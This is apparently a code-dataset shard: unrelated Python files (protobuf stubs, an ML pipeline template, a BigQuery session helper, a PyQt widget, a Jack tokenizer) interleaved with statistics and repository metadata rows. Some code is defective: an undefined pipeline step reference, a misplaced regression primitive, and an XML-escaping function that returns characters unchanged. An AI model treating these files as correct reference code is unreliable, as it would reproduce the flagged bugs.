file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='value', full_name='walkthrough.Counter.value', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=74,
serialized_end=98,
)
_HELLOREPLY = _descriptor.Descriptor(
name='HelloReply',
full_name='walkthrough.HelloReply',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='message', full_name='walkthrough.HelloReply.message', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=100,
serialized_end=129,
)
_EVENT = _descriptor.Descriptor(
name='Event',
full_name='walkthrough.Event',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=131,
serialized_end=138,
)
DESCRIPTOR.message_types_by_name['Hello'] = _HELLO
DESCRIPTOR.message_types_by_name['AnotherHello'] = _ANOTHERHELLO
DESCRIPTOR.message_types_by_name['Counter'] = _COUNTER
DESCRIPTOR.message_types_by_name['HelloReply'] = _HELLOREPLY
DESCRIPTOR.message_types_by_name['Event'] = _EVENT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Hello = _reflection.GeneratedProtocolMessageType('Hello', (_message.Message,), dict(
DESCRIPTOR = _HELLO,
__module__ = 'walkthrough_pb2'
# @@protoc_insertion_point(class_scope:walkthrough.Hello)
))
_sym_db.RegisterMessage(Hello)
AnotherHello = _reflection.GeneratedProtocolMessageType('AnotherHello', (_message.Message,), dict(
DESCRIPTOR = _ANOTHERHELLO,
__module__ = 'walkthrough_pb2'
# @@protoc_insertion_point(class_scope:walkthrough.AnotherHello)
))
_sym_db.RegisterMessage(AnotherHello)
Counter = _reflection.GeneratedProtocolMessageType('Counter', (_message.Message,), dict(
DESCRIPTOR = _COUNTER,
__module__ = 'walkthrough_pb2'
# @@protoc_insertion_point(class_scope:walkthrough.Counter)
))
_sym_db.RegisterMessage(Counter)
HelloReply = _reflection.GeneratedProtocolMessageType('HelloReply', (_message.Message,), dict(
DESCRIPTOR = _HELLOREPLY,
__module__ = 'walkthrough_pb2'
# @@protoc_insertion_point(class_scope:walkthrough.HelloReply)
))
_sym_db.RegisterMessage(HelloReply)
Event = _reflection.GeneratedProtocolMessageType('Event', (_message.Message,), dict(
DESCRIPTOR = _EVENT,
__module__ = 'walkthrough_pb2'
# @@protoc_insertion_point(class_scope:walkthrough.Event)
))
_sym_db.RegisterMessage(Event)
# @@protoc_insertion_point(module_scope)
| 28.413043
| 286
| 0.72303
| 757
| 6,535
| 5.976222
| 0.253633
| 0.024757
| 0.041777
| 0.028736
| 0.421972
| 0.387268
| 0.387268
| 0.387268
| 0.378868
| 0.31145
| 0
| 0.021739
| 0.1342
| 6,535
| 229
| 287
| 28.537118
| 0.777837
| 0.189135
| 0
| 0.613636
| 0
| 0.005682
| 0.142801
| 0.075313
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028409
| 0
| 0.028409
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c978b614564b15ad98ff9be9b231eda20bb8f13d
| 6,405
|
py
|
Python
|
python/dsbox/template/template_files/loaded/SRIClassificationTemplate.py
|
usc-isi-i2/dsbox-ta2
|
85e0e8f5bbda052fa77cb98f4eef1f4b50909fd2
|
[
"MIT"
] | 7
|
2018-05-10T22:19:44.000Z
|
2020-07-21T07:28:39.000Z
|
python/dsbox/template/template_files/loaded/SRIClassificationTemplate.py
|
usc-isi-i2/dsbox-ta2
|
85e0e8f5bbda052fa77cb98f4eef1f4b50909fd2
|
[
"MIT"
] | 187
|
2018-04-13T17:19:24.000Z
|
2020-04-21T00:41:15.000Z
|
python/dsbox/template/template_files/loaded/SRIClassificationTemplate.py
|
usc-isi-i2/dsbox-ta2
|
85e0e8f5bbda052fa77cb98f4eef1f4b50909fd2
|
[
"MIT"
] | 7
|
2018-07-10T00:14:07.000Z
|
2019-07-25T17:59:44.000Z
|
from dsbox.template.template import DSBoxTemplate
from d3m.metadata.problem import TaskKeyword
from dsbox.template.template_steps import TemplateSteps
from dsbox.schema import SpecializedProblem
import typing
import numpy as np # type: ignore
class SRIClassificationTemplate(DSBoxTemplate):
    """DSBox pipeline template for vertex-classification tasks over
    graph / edgeList / table inputs, using SRI-style preprocessing.

    The whole template is a declarative dict consumed by the DSBox
    runtime: each entry of "steps" names a pipeline step, its candidate
    primitives (with a hyperparameter search space) and its input step(s).
    """

    def __init__(self):
        DSBoxTemplate.__init__(self)
        self.template = {
            "weight": 30,
            "name": "SRI_classification_template",
            "taskSubtype": {TaskKeyword.VERTEX_CLASSIFICATION.name},
            "taskType": {TaskKeyword.VERTEX_CLASSIFICATION.name},
            # "taskType": {TaskKeyword.VERTEX_CLASSIFICATION.name, TaskKeyword.COMMUNITY_DETECTION.name, TaskKeyword.LINK_PREDICTION.name, TaskKeyword.TIME_SERIES.name},
            # "taskSubtype": {"NONE", TaskKeyword.NONOVERLAPPING.name, TaskKeyword.OVERLAPPING.name, TaskKeyword.MULTICLASS.name, TaskKeyword.BINARY.name, TaskKeyword.MULTILABEL.name, TaskKeyword.MULTIVARIATE.name, TaskKeyword.UNIVARIATE.name, TaskKeyword.TIME_SERIES.name},
            #"inputType": "table",
            "inputType": {"edgeList", "graph", "table"},
            "output": "prediction_step",
            "steps": [
                # Dataset-level preprocessing: read text columns, flatten the
                # dataset, convert to a dataframe and profile/parse columns.
                {
                    "name": "text_reader_step",
                    "primitives": ["d3m.primitives.data_preprocessing.dataset_text_reader.DatasetTextReader"],
                    "inputs": ["template_input"]
                },
                {
                    "name": "denormalize_step",
                    "primitives": ["d3m.primitives.data_transformation.denormalize.Common"],
                    "inputs": ["text_reader_step"]
                },
                {
                    "name": "to_dataframe_step",
                    "primitives": ["d3m.primitives.data_transformation.dataset_to_dataframe.Common"],
                    "inputs": ["denormalize_step"]
                },
                {
                    "name": "common_profiler_step",
                    "primitives": ["d3m.primitives.schema_discovery.profiler.Common"],
                    "inputs": ["to_dataframe_step"]
                },
                {
                    "name": "parser_step",
                    "primitives": ["d3m.primitives.data_transformation.column_parser.Common"],
                    "inputs": ["common_profiler_step"]
                },
                # Target extraction: select TrueTarget columns, then parse them.
                {
                    "name": "pre_extract_target_step",
                    "primitives": [{
                        "primitive": "d3m.primitives.data_transformation.extract_columns_by_semantic_types.Common",
                        "hyperparameters":
                            {
                                'semantic_types': ('https://metadata.datadrivendiscovery.org/types/TrueTarget',),
                                'use_columns': (),
                                'exclude_columns': ()
                            }
                    }],
                    "inputs": ["parser_step"]
                },
                {
                    "name": "extract_target_step",
                    "primitives": ["d3m.primitives.data_transformation.simple_column_parser.DataFrameCommon"],
                    "inputs": ["pre_extract_target_step"]
                },
                # Attribute extraction and numeric conditioning.
                {
                    "name": "extract_attribute_step",
                    "primitives": [{
                        "primitive": "d3m.primitives.data_transformation.extract_columns_by_semantic_types.Common",
                        "hyperparameters":
                            {
                                'semantic_types': ('https://metadata.datadrivendiscovery.org/types/Attribute',),
                            }
                    }],
                    "inputs": ["parser_step"]
                },
                {
                    "name": "data_conditioner_step",
                    "primitives": [{
                        "primitive": "d3m.primitives.data_transformation.conditioner.Conditioner",
                        "hyperparameters":
                            {
                                "ensure_numeric": [True],
                                "maximum_expansion": [30]
                            }
                    }],
                    "inputs": ["extract_attribute_step"]
                },
                # Model search space: several candidate learners are tried.
                {
                    "name": "model_step",
                    "primitives": [
                        {
                            "primitive": "d3m.primitives.classification.bernoulli_naive_bayes.SKlearn",
                            "hyperparameters": {
                                'alpha': [0.1, 1.0],
                                'binarize': [0.0],
                                'fit_prior': [False],
                                'return_result': ["new"],
                                'use_semantic_types': [False],
                                'add_index_columns': [False],
                                'error_on_no_input': [True],
                            }
                        },
                        {
                            # NOTE(review): this is a *regression* primitive in a
                            # classification template, and 'fit_prior' is not a
                            # gradient-boosting hyperparameter (looks copied from
                            # the naive-bayes entry above) — confirm intended.
                            "primitive": "d3m.primitives.regression.gradient_boosting.SKlearn",
                            "hyperparameters": {
                                'max_depth': [5, 8],
                                'learning_rate': [0.3, 0.5],
                                'min_samples_split': [2, 3, 6],
                                'min_samples_leaf': [1, 2],
                                'criterion': ["mse"],
                                'n_estimators': [100, 150],
                                'fit_prior': [False],
                                'return_result': ["new"],
                                'use_semantic_types': [False],
                                'add_index_columns': [False],
                                'error_on_no_input': [True],
                            }
                        },
                        {"primitive": "d3m.primitives.classification.random_forest.SKlearn"
                        }
                    ],
                    # NOTE(review): "extract_attribute_step2" is not defined in this
                    # template (only "extract_attribute_step" / "data_conditioner_step"
                    # exist) — likely a stale step reference; verify before running.
                    "inputs": ["extract_attribute_step2", "extract_target_step"]
                },
                {
                    "name": "prediction_step",
                    "primitives": ["d3m.primitives.data_transformation.construct_predictions.Common"],
                    "inputs": ["model_step", "to_dataframe_step"]
                }
            ]
        }
| 48.157895
| 274
| 0.444653
| 416
| 6,405
| 6.555288
| 0.338942
| 0.061973
| 0.056106
| 0.090942
| 0.387605
| 0.341768
| 0.259259
| 0.239457
| 0.239457
| 0.195086
| 0
| 0.011844
| 0.44637
| 6,405
| 132
| 275
| 48.522727
| 0.757191
| 0.070414
| 0
| 0.198413
| 0
| 0
| 0.353456
| 0.160081
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007937
| false
| 0
| 0.047619
| 0
| 0.063492
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c978cd7b9db932291bd60fddc562ff295cb80fc4
| 192
|
py
|
Python
|
beecrowd exercises/beecrowd-1019.py
|
pachecosamuel/Python-Exercises
|
de542536dd1a2bc0ad27e81824713cda8ad34054
|
[
"MIT"
] | null | null | null |
beecrowd exercises/beecrowd-1019.py
|
pachecosamuel/Python-Exercises
|
de542536dd1a2bc0ad27e81824713cda8ad34054
|
[
"MIT"
] | null | null | null |
beecrowd exercises/beecrowd-1019.py
|
pachecosamuel/Python-Exercises
|
de542536dd1a2bc0ad27e81824713cda8ad34054
|
[
"MIT"
] | null | null | null |
def split_time(total_seconds):
    """Split a duration in seconds into hours, minutes and seconds.

    Args:
        total_seconds (int): non-negative duration in seconds.

    Returns:
        list[str]: [hours, minutes, seconds] as decimal strings
        (hours is not zero-padded, matching the original output).
    """
    parts = []
    for unit in (3600, 60, 1):
        qtd = total_seconds // unit
        parts.append(str(qtd))
        total_seconds -= qtd * unit
    return parts


if __name__ == '__main__':
    # Was `eval(input())`: eval executes arbitrary expressions from stdin,
    # which is unsafe and unnecessary — the input is a plain integer.
    time = int(input())
    hours, minutes, seconds = split_time(time)
    print(f'{hours}:{minutes}:{seconds}')
| 16
| 45
| 0.557292
| 30
| 192
| 3.566667
| 0.6
| 0.130841
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 0.21875
| 192
| 11
| 46
| 17.454545
| 0.646667
| 0
| 0
| 0
| 0
| 0
| 0.183246
| 0.183246
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c97a5d77ecd44aba596f1a6d89d78783ed1f6a39
| 5,458
|
py
|
Python
|
bigorm/database.py
|
AnthonyPerez/bigorm
|
67ecdbb1f99cd5c8ec2ca24c7ba5f5dbed7493bb
|
[
"MIT"
] | null | null | null |
bigorm/database.py
|
AnthonyPerez/bigorm
|
67ecdbb1f99cd5c8ec2ca24c7ba5f5dbed7493bb
|
[
"MIT"
] | 3
|
2020-04-06T19:13:58.000Z
|
2020-05-22T22:21:31.000Z
|
bigorm/database.py
|
AnthonyPerez/bigorm
|
67ecdbb1f99cd5c8ec2ca24c7ba5f5dbed7493bb
|
[
"MIT"
] | null | null | null |
import threading
import functools
import sqlalchemy
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()  # shared SQLAlchemy declarative base for all ORM models
class DatabaseContextError(RuntimeError):
    """Raised when a session/engine is requested outside an active DatabaseContext."""
    pass
"""
Once an engine is created is is not destroyed until the program itself exits.
Engines are used to produce a new session when a context is entered.
When a context is exited, the session for that context is destroyed.
"""
global_database_context = threading.local()
class DatabaseContext(object):
    """
    Context manager binding a SQLAlchemy engine/session pair to the
    current thread (state lives in ``global_database_context``).

    This is fairly complicated. Follow these rules:
    1) Do not create threads in a DatabaseContext. If you
    do you will lose the context.
    2) With async/await asynchronous programming,
    enter contexts in atomic blocks (do not await in a context).
    Usage:
    with DatabaseContext():
    """

    @classmethod
    def __get_engines(_):
        # Lazily create this thread's engine cache:
        # (args, sorted kwargs) -> (engine, sessionmaker).
        if not hasattr(global_database_context, 'engines'):
            global_database_context.engines = {}
        return global_database_context.engines

    @classmethod
    def __get_sessions(_):
        # Lazily create this thread's stack of (engine, session) pairs.
        if not hasattr(global_database_context, 'sessions'):
            global_database_context.sessions = []
        return global_database_context.sessions

    @classmethod
    def get_session(_):
        """Return the innermost active session; raise DatabaseContextError if none."""
        sessions = DatabaseContext.__get_sessions()
        if len(sessions) == 0:
            raise DatabaseContextError('Session not established, did you create a DatabaseContext?')
        _, session = sessions[-1]
        return session

    @classmethod
    def get_engine(_):
        """Return the innermost active engine; raise DatabaseContextError if none."""
        sessions = DatabaseContext.__get_sessions()
        if len(sessions) == 0:
            raise DatabaseContextError('Session not established, did you create a DatabaseContext?')
        engine, _ = sessions[-1]
        return engine

    @classmethod
    def is_in_context(_):
        """True when at least one DatabaseContext is currently entered on this thread."""
        sessions = DatabaseContext.__get_sessions()
        return len(sessions) > 0

    def __init__(self, *args, **kwargs):
        """
        All arguments are forwarded to create_engine
        """
        self.args = args
        self.kwargs = kwargs

    def __enter__(self):
        # Engines are cached per (args, kwargs) key and reused for the
        # process lifetime; a fresh session is opened per context entry.
        # NOTE: returns None, so `with DatabaseContext() as x` binds None;
        # use DatabaseContext.get_session() inside the block instead.
        key = (tuple(self.args), tuple(sorted(list(self.kwargs.items()))))
        engine, Session = DatabaseContext.__get_engines().get(key, (None, None))
        if engine is None:
            engine = sqlalchemy.create_engine(
                *self.args,
                **self.kwargs
            )
            Session = sqlalchemy.orm.sessionmaker(bind=engine)
            DatabaseContext.__get_engines()[key] = (engine, Session)
        new_session = Session()
        DatabaseContext.__get_sessions().append(
            (engine, new_session)
        )

    def __exit__(self, exception_type, exception_value, traceback):
        # Pop this context's session; roll back on error, always close.
        _, session = DatabaseContext.__get_sessions().pop()
        try:
            if exception_type is not None:
                # There was an exception, roll back.
                session.rollback()
        finally:
            session.close()
class BigQueryDatabaseContext(DatabaseContext):
    """DatabaseContext that connects to Google BigQuery via a
    ``bigquery://`` SQLAlchemy URL."""

    def __init__(self, project='', default_dataset='', **kwargs):
        """
        Build the BigQuery connection string and delegate to DatabaseContext.

        Args:
            project (Optional[str]): The project name, defaults to
                your credential's default project.
            default_dataset (Optional[str]): The default dataset,
                used when a table's __tablename__ carries no dataset.
            **kwargs (kwargs): Appended verbatim as URL query parameters,
                e.g.:
                'bigquery://some-project/some-dataset' '?'
                'credentials_path=/some/path/to.json' '&'
                'location=some-location' '&'
                'arraysize=1000' '&'
                'clustering_fields=a,b,c' '&'
                'create_disposition=CREATE_IF_NEEDED' '&'
                'destination=different-project.different-dataset.table' '&'
                'destination_encryption_configuration=some-configuration' '&'
                'dry_run=true' '&'
                'labels=a:b,c:d' '&'
                'maximum_bytes_billed=1000' '&'
                'priority=INTERACTIVE' '&'
                'schema_update_options=ALLOW_FIELD_ADDITION,ALLOW_FIELD_RELAXATION' '&'
                'use_query_cache=true' '&'
                'write_disposition=WRITE_APPEND'
                These keyword arguments match those in the job configuration:
                https://googleapis.github.io/google-cloud-python/latest/bigquery/generated/google.cloud.bigquery.job.QueryJobConfig.html#google.cloud.bigquery.job.QueryJobConfig
        """
        connection_str = 'bigquery://{}/{}'.format(project, default_dataset)
        # Append query parameters only when some were supplied.
        if kwargs:
            query = '&'.join('{}={}'.format(k, v) for k, v in kwargs.items())
            connection_str = '{}?{}'.format(connection_str, query)
        super(BigQueryDatabaseContext, self).__init__(
            connection_str
        )
def requires_database_context(f):
    """
    Decorator that raises DatabaseContextError when the wrapped function
    is invoked while no DatabaseContext is active on the current thread.
    """
    @functools.wraps(f)
    def guarded(*args, **kwargs):
        if DatabaseContext.is_in_context():
            return f(*args, **kwargs)
        raise DatabaseContextError('Session not established, did you create a DatabaseContext?')
    return guarded
| 34.327044
| 177
| 0.622206
| 568
| 5,458
| 5.767606
| 0.357394
| 0.03663
| 0.044872
| 0.025641
| 0.139194
| 0.117216
| 0.09707
| 0.09707
| 0.09707
| 0.09707
| 0
| 0.004344
| 0.283071
| 5,458
| 158
| 178
| 34.544304
| 0.832865
| 0.326676
| 0
| 0.164557
| 0
| 0
| 0.06728
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.139241
| false
| 0.012658
| 0.050633
| 0
| 0.316456
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c97aeafdeaa32ce81d91fe53e55f4082c9dd290e
| 444
|
py
|
Python
|
src/rover/project/code/decision.py
|
juancruzgassoloncan/Udacity-Robo-nanodegree
|
7621360ce05faf90660989e9d28f56da083246c9
|
[
"MIT"
] | 1
|
2020-12-28T13:58:34.000Z
|
2020-12-28T13:58:34.000Z
|
src/rover/project/code/decision.py
|
juancruzgassoloncan/Udacity-Robo-nanodegree
|
7621360ce05faf90660989e9d28f56da083246c9
|
[
"MIT"
] | null | null | null |
src/rover/project/code/decision.py
|
juancruzgassoloncan/Udacity-Robo-nanodegree
|
7621360ce05faf90660989e9d28f56da083246c9
|
[
"MIT"
] | null | null | null |
import numpy as np
from rover_sates import *
from state_machine import *
# This is where you can build a decision tree for determining throttle, brake and steer
# commands based on the output of the perception_step() function
def decision_step(Rover, machine):
    """Advance the rover for one perception/decision cycle.

    When navigation angles are available, delegate to the state machine;
    otherwise fall back to default throttle with no steering or braking.
    Returns the (mutated) Rover object.
    """
    if Rover.nav_angles is None:
        # No perception data yet: drive straight at the default throttle.
        Rover.throttle = Rover.throttle_set
        Rover.steer = 0
        Rover.brake = 0
    else:
        machine.run()
    return Rover
| 23.368421
| 87
| 0.702703
| 65
| 444
| 4.707692
| 0.676923
| 0.084967
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005952
| 0.243243
| 444
| 18
| 88
| 24.666667
| 0.904762
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.272727
| 0
| 0.454545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9801e27d75fc448c57278f4f2febd70cf000239
| 3,203
|
py
|
Python
|
alfred/views/main_widget.py
|
Sefrwahed/Alfred
|
0b77ec547fb665ef29fe1a3b7e1c4ad30c31170d
|
[
"MIT"
] | 5
|
2016-09-06T10:29:24.000Z
|
2017-02-22T14:07:48.000Z
|
alfred/views/main_widget.py
|
Sefrwahed/Alfred
|
0b77ec547fb665ef29fe1a3b7e1c4ad30c31170d
|
[
"MIT"
] | 66
|
2016-09-06T06:40:24.000Z
|
2022-03-11T23:18:05.000Z
|
alfred/views/main_widget.py
|
Sefrwahed/Alfred
|
0b77ec547fb665ef29fe1a3b7e1c4ad30c31170d
|
[
"MIT"
] | 3
|
2016-10-06T15:17:38.000Z
|
2016-12-04T13:25:53.000Z
|
import json
# PyQt imports
from PyQt5.QtCore import Qt, pyqtSignal, pyqtSlot
from PyQt5.QtWidgets import QDialog
from PyQt5.QtWebChannel import QWebChannel
# Local includes
from .ui.widget_ui import Ui_Dialog
from alfred import data_rc
import alfred.alfred_globals as ag
from alfred.modules.api.view_components import ARow, AColumn, ACard, AHeading
class MainWidget(QDialog, Ui_Dialog):
    """Main Alfred window: a frameless dialog whose content is a web view,
    driven through a QWebChannel bridge object and small JavaScript snippets."""

    # Emitted with the line-edit contents when the user presses Enter.
    text_changed = pyqtSignal('QString')

    def __init__(self, bridge_obj):
        QDialog.__init__(self)
        self.setupUi(self)
        # Frameless, translucent window chrome.
        self.setWindowFlags(Qt.Window | Qt.FramelessWindowHint)
        self.setAttribute(Qt.WA_TranslucentBackground, True)
        self.lineEdit.returnPressed.connect(self.send_text)
        # Expose bridge_obj to the page's JavaScript under the name "web_bridge".
        self.channel = QWebChannel(self.webView.page())
        self.webView.page().setWebChannel(self.channel)
        self.bridge_obj = bridge_obj
        self.channel.registerObject("web_bridge", bridge_obj)

    def clear_view(self):
        """Blank the main web view."""
        self.webView.page().setHtml("")

    def set_status_icon_busy(self, busy):
        """Collapse/restore the status icon's 'inner' element to signal busy state."""
        if busy:
            self.bot_status_icon.page().runJavaScript("document.getElementById('inner').style.width = '0px';")
        else:
            self.bot_status_icon.page().runJavaScript("document.getElementById('inner').style.width = '20px';")

    def show_busy_state_widget(self):
        """Show the 'busy learning' placeholder card."""
        self.show_special_widget("Please wait...", "Alfred is busy learning at the moment :D")

    def show_module_running_widget(self, module_name):
        """Show a placeholder card while *module_name* runs."""
        self.show_special_widget("Module is running, Please wait...", "{} module is predicted".format(module_name.capitalize()))

    def show_no_modules_view(self):
        """Show the 'no modules installed' placeholder card."""
        self.show_special_widget("Please install some modules", "No modules found :(")

    def show_special_widget(self, title, content, color=''):
        """Render a single card (title + level-3 heading) into the web view."""
        temp = ag.main_components_env.get_template("widgets.html")
        components = [ARow(AColumn(12, ACard(title, AHeading(3, content,color=color))))]
        # NOTE(review): the template kwarg is spelled "componenets" in every
        # render call — presumably matching the template's variable name.
        html = temp.render(componenets=components)
        self.webView.page().setHtml(html)

    @pyqtSlot()
    def send_text(self):
        """Emit text_changed with the line edit's text, ignoring empty input."""
        msg = self.lineEdit.text()
        if msg != '':
            self.text_changed.emit(msg)
            self.last_text = msg

    @pyqtSlot(list)
    def set_widget_view(self, components):
        """Render *components* with the widgets template into the web view."""
        temp = ag.main_components_env.get_template("widgets.html")
        html = temp.render(componenets=components)
        # print(html)
        self.webView.page().setHtml(html)

    @pyqtSlot(list)
    def set_view(self, components):
        """Render *components* with the base template into the web view."""
        temp = ag.main_components_env.get_template("base.html")
        html = temp.render(componenets=components)
        # print(html)
        self.webView.page().setHtml(html)

    @pyqtSlot(str)
    def remove_component(self, dom_id):
        """Fade out and remove the DOM element with id *dom_id* in the page."""
        js = "jQuery('#{}').fadeOut(function(){{ jQuery(this).remove() }});".format(dom_id)
        # print(js)
        self.webView.page().runJavaScript(js)

    @pyqtSlot(str, str)
    def append_content(self, parent_dom_id, element_html):
        """Prepend *element_html* (collapsed to one line, single quotes
        stripped so it can sit inside the JS string) to *parent_dom_id*."""
        js = "jQuery('{}').prependTo('#{}').hide().fadeIn();".format(("".join(element_html.splitlines())).replace("'", ""), parent_dom_id)
        # print(js)
        self.webView.page().runJavaScript(js)
| 37.244186
| 138
| 0.67468
| 391
| 3,203
| 5.337596
| 0.352941
| 0.042166
| 0.057499
| 0.042166
| 0.324389
| 0.307619
| 0.26162
| 0.26162
| 0.26162
| 0.196454
| 0
| 0.00348
| 0.192632
| 3,203
| 86
| 139
| 37.244186
| 0.803558
| 0.022167
| 0
| 0.193548
| 0
| 0
| 0.134357
| 0.060461
| 0
| 0
| 0
| 0
| 0
| 1
| 0.193548
| false
| 0
| 0.129032
| 0
| 0.354839
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c98046d6e476b2db7f4e9b5014b73851b0a58d74
| 5,573
|
py
|
Python
|
projects/11/jackTokenizer.py
|
nadavWeisler/Nand2Tetris
|
59c2e616c45044c15b99aeb8459d39b59e5e07ba
|
[
"MIT"
] | null | null | null |
projects/11/jackTokenizer.py
|
nadavWeisler/Nand2Tetris
|
59c2e616c45044c15b99aeb8459d39b59e5e07ba
|
[
"MIT"
] | null | null | null |
projects/11/jackTokenizer.py
|
nadavWeisler/Nand2Tetris
|
59c2e616c45044c15b99aeb8459d39b59e5e07ba
|
[
"MIT"
] | null | null | null |
import re
from utils import *
class JackTokenizer:
    """Tokenizer for the Jack language.

    Strips line and block comments from the source file, splits each
    remaining line into tokens, classifies every token (keyword, symbol,
    identifier, integerConstant, stringConstant) and accumulates an XML
    representation in self._xml.
    """

    def __init__(self, file_name):
        # NOTE(review): the file handle is never closed explicitly; it is
        # released only when the tokenizer is garbage-collected.
        self._file = open(file_name, 'r')
        self._data = []     # comment-stripped source lines
        self._types = []    # token types, parallel to self._tokens
        self._tokens = []
        self._xml = ['<tokens>']
        self._tokens_iterator = iter(self._tokens)
        self._token_types_iterator = iter(self._types)
        self._current_token = ""
        self._current_token_type = ""

    def got_more_tokens(self):
        """Advance to the next token.

        Returns True on success, False when the token stream is exhausted.
        """
        try:
            self._current_token = next(self._tokens_iterator)
            self._current_token_type = next(self._token_types_iterator)
            return True
        except StopIteration:
            # Fix: was a bare `except:`, which silently swallowed *every*
            # error (including KeyboardInterrupt); only end-of-iteration
            # legitimately means "no more tokens".
            return False

    def get_token(self):
        """Return (type, token) for the current token."""
        return self._current_token_type, self._current_token

    @staticmethod
    def is_keyword(token):
        return token in KEYWORDS

    @staticmethod
    def is_symbol(token):
        return token in SYMBOLS

    def is_identifier(self, token):
        # Identifier: non-empty, does not start with a digit, begins with
        # word characters, and is not a reserved keyword.
        return len(token) >= 1 and not token[0].isdigit() and \
            re.match(r'^[A-Za-z0-9_]+', token) is not None and \
            not self.is_keyword(token)

    @staticmethod
    def is_int(token):
        return token.isdigit() and 0 <= int(token) <= MAX_INT

    @staticmethod
    def is_string(token):
        # A double-quoted literal with no embedded quote and no newline.
        return len(token) >= 2 and \
            (token[0] == '\"' and
             token[-1] == '\"' and
             '\"' not in token[1:-1] and
             NEW_LINE not in token[1:-1])

    def get_token_type(self, token):
        """Classify *token*; returns None for unrecognized text."""
        if self.is_keyword(token):
            return 'keyword'
        elif self.is_symbol(token):
            return 'symbol'
        elif self.is_identifier(token):
            return 'identifier'
        elif self.is_int(token):
            return 'integerConstant'
        elif self.is_string(token):
            return 'stringConstant'

    def filter(self):
        """Strip // and /* ... */ comments from the source into self._data.

        Lines where comment markers appear inside string literals are kept
        verbatim (matched by the three regexes below).
        """
        start = False   # True while inside a /* ... */ block comment
        for line in self._file:
            segment1 = ""
            segment2 = ""
            temp = line.strip()
            # Comment markers embedded inside a string literal: keep the line.
            matcher1 = re.match('.*\"[^\"]*//[^\"]*\".*', temp)
            matcher2 = re.match('.*\"[^\"]*/\*{1,2}[^\"]*\".*', temp)
            matcher3 = re.match('.*\"[^\"]*\*/[^\"]*\".*', temp)
            if matcher1 is not None or matcher2 is not None or matcher3 is not None:
                self._data.append(temp[:])
                continue
            arr = temp.split('/*')
            if len(arr) > 1:
                start = True
                segment1 = arr[0]   # code before the block comment opens
            if start:
                arr = temp.split('*/')
                if len(arr) > 1:
                    segment2 = arr[1]   # code after the block comment closes
                    start = False
                result = segment1[:] + segment2[:]
                if len(result):
                    self._data.append(segment1[:] + segment2[:])
            else:
                # Drop any trailing // comment and normalize whitespace.
                temp = ' '.join(temp.split('//')[0].split())
                if len(temp):
                    self._data.append(temp[:])

    @staticmethod
    def convert_lt_gt_quot_amp(char):
        # NOTE(review): as written this returns each character unchanged
        # (and None for anything else). It was presumably meant to map to
        # XML entities (&lt; &gt; &quot; &amp;) and the mapping may have
        # been lost in a copy — confirm against the expected XML output
        # before changing; behavior is preserved here.
        if char == '<':
            return '<'
        elif char == '>':
            return '>'
        elif char == '\"':
            return '"'
        elif char == '&':
            return '&'

